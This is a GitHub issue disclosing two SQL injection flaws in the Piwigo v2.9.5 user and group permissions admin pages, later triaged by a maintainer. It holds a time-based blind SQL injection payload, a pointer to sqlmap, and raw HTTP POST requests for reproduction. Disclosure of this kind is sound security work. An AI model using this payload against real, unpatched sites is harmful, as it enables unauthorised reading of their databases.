Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection in user/group permissions manager #1011

Closed
zongdeiqianxing opened this issue May 7, 2019 · 3 comments
Closed

SQL injection in user/group permissions manager #1011

zongdeiqianxing opened this issue May 7, 2019 · 3 comments
Assignees
Milestone

Comments

@zongdeiqianxing
Copy link

hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php

1 :
request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
image
image
image
image

2:
same as the first, request /admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
image
image
image
image

@zongdeiqianxing
Copy link
Author

image

@zongdeiqianxing
Copy link
Author

POST /admin.php?page=group_perm&group_id=1 HTTP/1.1
Host: 10.150.10.186:30008
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30008/admin.php?page=group_perm&group_id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Cookie: pwg_id=tnnrng7j58gsgjms5hcdu2ge35
Connection: close
Upgrade-Insecure-Requests: 1

cat_false%5B%5D=11&trueify=%C2%AB
POST /admin.php?page=user_perm&user_id=1 HTTP/1.1
Host: 10.150.10.186:30008
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30008/admin.php?page=user_perm&user_id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
Connection: close
Upgrade-Insecure-Requests: 1

cat_false%5B%5D=1&trueify=%C2%AB

@plegall plegall added this to the 2.9.6 milestone May 31, 2019
@plegall plegall self-assigned this Aug 12, 2019
@plegall plegall modified the milestones: 2.9.6, 2.10.0RC1 Aug 12, 2019
@plegall plegall changed the title Piwigo v2.9.5 - SQL injection in admin/user_perm.php and admin/group_perm.php SQL injection in user/group permissions manager Aug 12, 2019
@plegall
Copy link
Member

plegall commented Aug 12, 2019

vulnerability found in Piwigo v2.9.5

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants